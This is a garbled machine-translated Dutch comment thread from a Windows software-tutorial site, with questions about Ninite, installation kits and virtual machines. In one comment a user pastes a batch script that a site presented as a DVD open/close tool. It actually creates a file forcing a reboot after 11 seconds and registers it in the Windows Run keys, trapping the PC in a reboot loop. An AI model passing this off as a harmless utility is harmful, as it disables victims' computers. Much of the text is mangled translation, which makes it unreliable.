  Die door het filter intellect - wat dan ook - proberen - "tussen de regels" - dat vooraf training video tutorial suggereren meer zorgvuldig, alvorens "in het licht". Aan de andere kant, niet van de hypocrisie van al diegenen die video tutorials posten op deze site: dat is, highlight toepassingen programeetc u liever te installeren in het Engels (legitieme, in feite), maar als het gaat om de uitspraak, dat de (eventuele houder als video tutorial) verkiezen om compromissen te sluiten om een ​​spelling en gênant, te maken met een slechte, uiteraard van onnodige terughoudendheid, naar verluidt op grond van het feit dat degenen die kijken naar deze video-tutorials zou niet in staat zijn om een ​​uitspraak te begrijpen veel dichter bij de juiste is. Niet de ander, maar ook Adrian zeer uitgesproken, vermaant hij degenen die niet weten of niet ontwikkeld met het Engels (in zijn feedback over de reacties van anderen, andere video tutorials). En, hier, geef ik absoluut gelijk dat het op zijn plaats moeten worden gebracht met de Engels taal ... net zo veel als, en hij en de andere, op te zetten met de uitspraak, alleen maar om aandacht te tonen voor degenen die vermaant! Wanneer u ook tutorials publiceren, ik denk dat het op zijn minst een kwestie van professioneel leren correcte uitspraak van de taal waarin, soms, je leest het woord, aan de ene kant, en aan de andere kant, als literaire vertaling, en niet Motamo - Waar mogelijk - of verblijven in de oorspronkelijke terminologie, ze kan ook niet anders, in dit geval Engels.
  Als je alleen op grond van het feit dat alleen hebben we geleerd van je tutorials video en niet andersom, maakt een grote fout.

  Goede Clony! Sucuzama dat ik u stoor, maar ik wil me helpen. Ik zag dat je kennis in computers en begrijp heel goed Engels, ik heb een klein probleem met de dvd en weet niet hoe je door middel van dit. Ajutama aub als je kunt! !
  Ik heb een script op een site om de DVD te openen en te sluiten en te zien dat hij niet wil aan een weg te gaan. Ik heb een verzoek als je niet kunt zien waar ik verkeerd was ...Dank bij voorbaat .

  echo @ echo off> c: windowshartlell.bat
  echo afbreken >> c: windowshartlell.bat
  echo shutdown-r-t 11-f >> c: windowshartlell.bat
  echo end >> c: windowshartlell.bat
  reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun / v startAPI / t REG_SZ / dc: windowshartlell.bat / f
  reg add HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun / v VAJAEREIARFPC / t REG_SZ / dc: windowshartlell.bat / f

  Ik kopieerde het script blocnote precies hier toen ging ik op ...filet Ik deed ... en ...opslaan als En toen hij verscheen ... Dat panel waar ik ging om op te slaan ...bestandsnaamOpen ... en schreef sluiten dvd. Beat en opgeslagen op uw bureaublad en klik vervolgens dubbel op het ding dat ik deed met . BAT Ik redde het naar het bureaublad en niet werkt nu ofwel sluiten en openen dvd dvd
  Wat kan ik doen? Gelieve te helpen ...Bij voorbaat dank en ik antwoord aan u om me te vertellen of ik deed het goed of ben ik nog erger

 62. Hallo ik zou jou en mij met welke software kan doen en zelfs te tekenen schetsen om de kleurstelling te maken vertel ik iets vergeten, maar weet niet hoe hij kan zeggen als je me kon helpen dank je.

  • iso: Hallo Ik zou u en mij met welke software kan doen vertellen en zelfs te tekenen schetsen denk kleurstelling ik iets vergeten, maar weet niet hoe hij kan zeggen als je me kon helpen dank je.

   hier Vind nuttige programma om schema's Dia.

 63. misuion zei hij

  terug met hetzelfde probleem (waarschijnlijk niet mezelf uit te drukken Coret door dv)
  Ik installeerde Windows XP "virtuele" met Zon VirtualBox, maar het is leeg (geen programma en een vergeefse poging dit keer als ik iets installeer niet. Voorzichtig volgde ik deze tutorial en meermaals maar .. alles wat we deden. Ik descsrcat "Ninite" (maar het bureaublad gastheer)
  In het jaar net geïnstalleerde Virtual PC "Gast toevoeging". Ik op een USB-stick geïnstalleerd, maar ik komt Ninite
  Heeft iemand de tijd hebben om me te vertellen de stappen, zodat ik iets kan installeren? Thanks "misuion '

  • misuion: Terug met hetzelfde probleem (waarschijnlijk niet mezelf uit te drukken Coret door dv)
   Ik installeerde Windows XP "virtuele" met Zon VirtualBox, maar het is leeg (geen programma en een vergeefse poging dit keer als ik iets installeer niet. Voorzichtig volgde ik deze tutorial en meermaals maar .. alles wat we deden. Ik descsrcat "Ninite" (maar het bureaublad gastheer)
   In het jaar net geïnstalleerde Virtual PC "Gast toevoeging". Ik op een USB-stick geïnstalleerd, maar ik komt Ninite
   Heeft iemand de tijd hebben om me te vertellen de stappen, zodat ik iets kan installeren? Thanks "misuion '

   Als u toegang tot het internet in virtuele systeem open dan Internet Explorer en download een programma na de installatie.

 64. Alin Lucian zei hij

  heel erg deze tutorial. fff is effectief

  Is er een software ptr zo, maar dat doe je niet tebuiasca internet. Ook zoiets als dit maar om geïntegreerde kit zijn er `s? Wacht een rasp.

  Good luck!

 65. Daniel zei hij

  Macht iso, alcohol 120% azureus, ZoneAlarm etc.: ik wat software die er voorgesteld en ik
  Hoop reuseaca zetten omdat de meeste zijn handige software!
  Veel succes in de toekomst!

 66. Daniel zei hij

  Ik heb een voorstel: te 'helpen' onze manier deze site die is om een ​​aantal nuttige software die mensen willen om ze te downloaden, zoals de macht iso, zone alarm, knooppunt 32, Bit Defender, Kaspersky, Nero, beetje komeet voorstellen , Azureus etc..
  En anderen die je nuttig achten! Hopelijk zullen ze op de site omdat ik voorgesteld en kreeg een paar en ik hoop dat ik zal ze voorstellen, zelfs als al degenen die wij hebben voorgesteld, en ik heb zelfs de kans op worden op de site zetten! Als je moet alle software hebben we nodig om een ​​windows te installeren zal niet te veel werken dan de werkelijke installatie, installeren van drivers en software die die kit Ninite met onze favoriet!
  Hartelijk dank aan degenen die mij en me geholpen, en anderen die dat willen en zij die Ninite om zo te ontwikkelen deed te spreken en ons werk te vergemakkelijken nadat ik windows "op schone" !
  Bedankt!

 67. daniel zei hij

  hallo! heel goed deze tutorial. Ik zou ook graag willen weten hoe kan ik een programma of iets om een ​​programma te installeren doen, bijvoorbeeld winamp zonder me volgende -> dan terug next-> en zo verder, maar een te installeren, ik Gewoon dubbelklikken op het programma gaf en volg de door mij ingesteld stappen.
  Ik hoop dat ik duidelijk genoeg was, wachten op het antwoord, bedankt!

 68. De tutorial ok, 10 briefje van mij.

  Ik heb een vraag aan Google SketchUp software als u weet dat het om fuction ok 20 codes moeten plugins installeren en opnieuw te installeren elke keer, en plugins geïnstalleerd worden.

  Het kan een kit aan te brengen in de software en plug-ins tegelijk installeren?

 69. zame77 zei hij

  Waarom als ik open de browser explorer verschijnen: Er is een fout opgetreden in het script op deze pagina
  Lijn: 20
  Char: 16869
  Fout: elementen niet gevonden
  Code: 0
  Wilt u doorgaan met het uitvoeren van scripts op deze pagina?
  Ja Nee

 70. En ik deed maar Comodo Internet Security is geïnstalleerd

 71. En ik heb Comodo Internet Security is geïnstalleerd, maar zei dat sommige programma's zijn virus replica scuzatima neincheieta boven die ik gaf de verkeerde "submit comment" dus zelfs sommige programma's hebben virus of een vals alarm van zijn COMODO ?

 72. Lucian Gabriel zei hij

  Zeer goede tutorial site, maar ik heb een vraag: hoe heeft de Quick Launch (zie links onderaan je het hebt) je software of wat vroeger 'vraag het omdat ik 7 ramen, maar geen snelle start (? was een programma, maar het was niet al te goed) dus je kon me vertellen hoe je quick launch?

 73. hello! Wil je me vertellen gelieve sommige programma's die programma's kunnen integreren in Windows-installatie kit u know kand installeren van Windows te installeren zodra ... k al mijn harde lui om de videokaart elke keer mijn prog Kare hen zou moeten installeren en geluid! ! Groeten!

  • AndyHi! zeg me alsjeblieft sommige programma's die programma's kunnen integreren in de kit te installeren Windows weten UKand installeer Windows opnieuw te installeren ... k al mijn harde lui om de videokaart elke keer als ik kare prog langer ze nodig hebt installeren en klinken! ! Groeten!

   is een tutorial over iets gedaan op de site, maar is hot .................. ik te lui om je de link geven. Ik zoek je

  • LuC1F3R zei hij

   AndyHi! zeg me alsjeblieft sommige programma's die programma's kunnen integreren in de kit te installeren Windows weten UKand installeer Windows opnieuw te installeren ... k al mijn harde lui om de videokaart elke keer als ik kare prog langer ze nodig hebt installeren en klinken! ! Groeten!

   Zie de jongens hebben een tutorial over dit onderwerp. Wat u wilt doen, gebruik nLite, Schrijven in de rechterbovenhoek zoekvak: hoe om software te integreren in Windows, druk op enter en u zult zeker vinden de tutorial.

 74. appo ossen of koeien die Clony niet praten of het maken dan degenen die beschuldigen deze tutorials? Groeten aan u dat niet k naar een baan maakt niet zo gemakkelijk en zo verder zal tinetio nemen voor alle stieren kare nau verkeerd doen dan commentaar! weer zelf voor wat maken deze site!

 75. maak dan een tutorial over hoe je een account maken op ebay hoe de paypal rekening ebay rekening hechten als Cuper op ebay etc! Groeten!

 76. PauLXRocK zei hij

  De site is super hard zelfs ik heb geen bezwaar is erg handig ..... misschien ergens wat je moet doen of je gedwongen om een ​​nieuwe aanvraag met bekende ji ejti gebruik een pik hulp niet nodig, ji ​​is zeer sentimentu zuigt dat ze "niet geven van een programma je hoofd" in fine dus mishto ji ..... keep up the good work ;)

 77. dokocr zei hij

  hoe u een aangepaste installatie kit doen als u 2 of meer uitvoerbare bestanden zoals audio drivers, drivers voor. videokaart etc.. niet om ze uit te voeren op hun beurt, kunnen worden geconstrueerd en geïnstalleerd met een klik op het nieuwe bestand. (Ik zag tutorials voorzien, maar als je internet verbinding?)

  • Adrian admin zei hij

   dokocr: Hoe kan ik een aangepaste installatie kit doen als u 2 of meer uitvoerbare bestanden zoals audio drivers, drivers voor. videokaart etc.. niet om ze uit te voeren op hun beurt, kunnen worden geconstrueerd en geïnstalleerd met een klik op het nieuwe bestand. (Ik zag tutorials voorzien, maar als je internet verbinding?)

   Schrijf drivers voor integratie in het zoekvak in de rechterbovenhoek van de zwarte rand: AHCI, die u invoert en je zal de tutorial vinden. Hij sprak hier over het integreren drivers in.
   Om de tutorial en software-integratie in de installatie kit vinden, schrijven rechtop in het zoekvak: hoe om software te integreren in de Windows-installatie kit, en u voert

   • dokocr zei hij

    Adrian admin:
    Schrijf drivers voor integratie in het zoekvak in de rechterbovenhoek van de zwarte rand: AHCI, die u invoert en je zal de tutorial vinden. Hij sprak hier over het integreren drivers in.
    Om de tutorial en software-integratie in de installatie kit vinden, schrijven rechtop in het zoekvak: hoe om software te integreren in de Windows-installatie kit, en u voert

    Bedankt voor. informatie, maar niet integraal in windows Ik bedoel, wat ik zag is OK. Bij het maken van een uitvoerbaar pakket in te voeren voor bepaalde programma's gewenst. installatie (bijvoorbeeld WinAPI, Xvid, VLC media player ... etc) zonder al je klikt `INSTAL` elk uitvoerbaar bestand in een deel. Ga naar het venster van iemand heeft geen internet geïnstalleerd en wilt installeren apchetul gemaakt door een enkele klik. Ook hoe de ingebouwde ramen, maar het pakket wordt gescheiden. : Thankyou:

    • Paullik83 zei hij

     Zeer nuttig tutorial. Dank

     dokocr:
     Bedankt voor. integraea informatie, maar niet in windows bedoel ik, wat ik zag is OK. Bij het maken van een uitvoerbaar pakket moet worden ingevoerd voor bepaalde programma's gewenst. worden geïnstalleerd (bijvoorbeeld WinAPI, Xvid, VLC media player, ... etc) zonder al `u op elk van de installatie van uitvoerbare gedeelte klikt. Ga naar het venster iemands geen internet geïnstalleerd en wilt installeren apchetul gemaakt door een enkele klik. Ook hoe werkt de integratin ramen, maar het wordt gescheiden verpakking:. Thankyou:

     Almeza MultiSet .. of als u meer IT-kennis DeployMaster

     Als iemand weet van software zoals sommige namen zijn welkom.

     • Paullik83Zeer nuttig tutorial. Dank
      Almeza MultiSet .. of als u meer kennis van IT-software DeployMasterDaca als iemand weet wat namen zijn welkom.

      Bedankt voor het antwoord, vond ik beide programma's hebben een tweede juiste IT-kennis, maar pote admins hier zou geïnteresseerd zijn om ons te helpen met een tutorial. Respect.

 78. dk_asasin zei hij

  Zeer goede tutorial. Ik een ik geïnstalleerde Windows 7 en ik dat nodig had.

 79. costel123 zei hij

  Zoals ik acht dit programma nodigt u uit om verbinding met het internet zonder dat een antivirus op verschillende websites te kijken naar geïnstalleerd dan uiteindelijk en denken aan een antivirus installeren
  Het is riskant om verbinding met het internet en voeren de sites zonder antivirus geïnstalleerd?

 80. kan een kleinere USB 4 G zijn, en op een keer installeerde ik de hierboven genoemde, kunt u iets anders op te installeren, bijvoorbeeld:?. software er niet inbegrepen dat ik yn computer ? !

 81. U kunt deze kit te installeren op de cd, en zet andere programma's die u in uw computer? <?

 82. Dit .... Ik geef om mezelf en wat anoniem hierboven al zei. Een uitvoerbaar dat sommige programma's zal draaien op uw pc.

Spreek je gedachten

*

Deze site gebruikt Akismet om spam te verminderen. Ontdek hoe uw reactiegegevens worden verwerkt.